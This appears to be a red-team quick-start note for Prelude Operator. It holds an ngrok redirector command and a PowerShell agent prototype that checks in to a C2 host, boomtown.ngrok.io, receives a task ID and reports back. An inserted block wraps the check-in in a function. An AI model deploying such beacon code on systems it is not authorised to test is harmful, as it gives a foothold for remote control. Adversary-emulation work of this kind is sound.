Simple PowerShell Prelude Operator Quick Check
In this example we will use boomtown.ngrok.io; replace it with either your own ngrok instance or your redirector.
There are a couple of ways to redirect HTTP. The preferred method is a Gateway Redirector.
Cloudy with a chance of redirectors
ngrok example:
ngrok http --region=us --hostname=boomtown.ngrok.io 3391
Deploy a Cloud Gateway Redirector
{TODO}
$PreludeHTTPDomain = "https://boomtown.ngrok.io"
$Executors = @()
$Executors += 'psh'
$Links = @()
# Agent check-in body expected by Operator
$jsonBase = [pscustomobject]@{
    Name      = "Boomer"
    Target    = ""
    Hostname  = "APTz"
    Location  = ""
    Platform  = "windows"
    Executors = $Executors
    Range     = "BoomTown"
    Pwd       = ""
    Sleep     = 10
    Executing = ""
    Links     = $Links
}
# -Depth keeps nested Links objects from being truncated by the default depth of 2
$delivery = $jsonBase | ConvertTo-Json -Depth 4
# Checkin - Get Task
$response = Invoke-RestMethod -Uri $PreludeHTTPDomain -Method Post -Body $delivery -ContentType "application/json"
$ID = $response.links.ID
You should now see a callback in Operator.
$PreludeHTTPDomain = "https://boomtown.ngrok.io"
$Executors = @()
$Executors += 'psh'
$Links = @()
# Agent check-in body expected by Operator
$jsonBase = [pscustomobject]@{
    Name      = "Boomer"
    Target    = ""
    Hostname  = "APTz"
    Location  = ""
    Platform  = "windows"
    Executors = $Executors
    Range     = "BoomTown"
    Pwd       = ""
    Sleep     = 10
    Executing = ""
    Links     = $Links
}
# -Depth keeps nested Links objects from being truncated by the default depth of 2
$delivery = $jsonBase | ConvertTo-Json -Depth 4
# Checkin - Get Task
$response = Invoke-RestMethod -Uri $PreludeHTTPDomain -Method Post -Body $delivery -ContentType "application/json"
$ID = $response.links.ID
# Send Response: echo the task ID back with a result so Operator marks the link as complete
$Links += [pscustomobject]@{
    'ID'       = "$ID"
    'Executor' = 'psh'
    'Payload'  = ''
    'Request'  = ""
    'Response' = "Ready To Roll Out!"
    'Status'   = '0'
    'Pid'      = "$PID"
}
$jsonBase = [pscustomobject]@{
    Name      = "Boomer"
    Target    = ""
    Hostname  = "APTz"
    Location  = ""
    Platform  = "windows"
    Executors = $Executors
    Range     = "BoomTown"
    Pwd       = ""
    Sleep     = 10
    Executing = ""
    Links     = $Links
}
$deliveryResponse = $jsonBase | ConvertTo-Json -Depth 4
$response_delivery = Invoke-RestMethod -Uri $PreludeHTTPDomain -Method Post -Body $deliveryResponse -ContentType "application/json"
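The check-in above assumes the callback arrives. The following is an added example (not part of the original note) that wraps the same check-in in a function with a timeout and returns a pass/fail object, so a broken redirector or a server that answers without a task link is reported instead of silently producing an empty $ID. The domain, agent names and the assumption that a successful check-in carries at least one link with an ID are taken from the script above; the function name is made up here.

```powershell
# Added example: quick check of the Operator check-in path (not the project's own code).
function Invoke-PreludeQuickCheck {
    param(
        [Parameter(Mandatory)][string]$Domain,   # e.g. https://boomtown.ngrok.io
        [string]$Name     = "Boomer",
        [string]$Hostname = "APTz",
        [string]$Range    = "BoomTown",
        [int]$TimeoutSec  = 15
    )
    # Same check-in body as the script above, built once
    $body = [pscustomobject]@{
        Name = $Name; Target = ""; Hostname = $Hostname; Location = ""
        Platform = "windows"; Executors = @('psh'); Range = $Range
        Pwd = ""; Sleep = 10; Executing = ""; Links = @()
    } | ConvertTo-Json -Depth 4

    try {
        $resp = Invoke-RestMethod -Uri $Domain -Method Post -Body $body `
                    -ContentType "application/json" -TimeoutSec $TimeoutSec
    } catch {
        # Redirector down, wrong hostname, TLS failure, or Operator not listening
        return [pscustomobject]@{ Ok = $false; LinkID = $null
                                  Reason = "No response: $($_.Exception.Message)" }
    }

    # Assumption from the script above: a good check-in returns links carrying an ID
    $link = @($resp.links) | Where-Object { $_.ID } | Select-Object -First 1
    if (-not $link) {
        return [pscustomobject]@{ Ok = $false; LinkID = $null
                                  Reason = "Server answered but returned no link; check the redirector target and the range name" }
    }
    [pscustomobject]@{ Ok = $true; LinkID = $link.ID; Reason = "Callback received" }
}

$result = Invoke-PreludeQuickCheck -Domain "https://boomtown.ngrok.io"
$result | Format-List
```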
The aim here is to help ensure you are up and running quickly. Once you pass the check you are ready to start deploying more aggressive tests.
This is pretty rough and can be better, but it's a start ;-) Feedback welcome.
Additional ideas:
Fiddler debugging
Simple DNS C2, etc.
WebShell
WSH harnesses: JScript, VBScript, VBA, HTA, SCT, etc.
These are just some prototypes.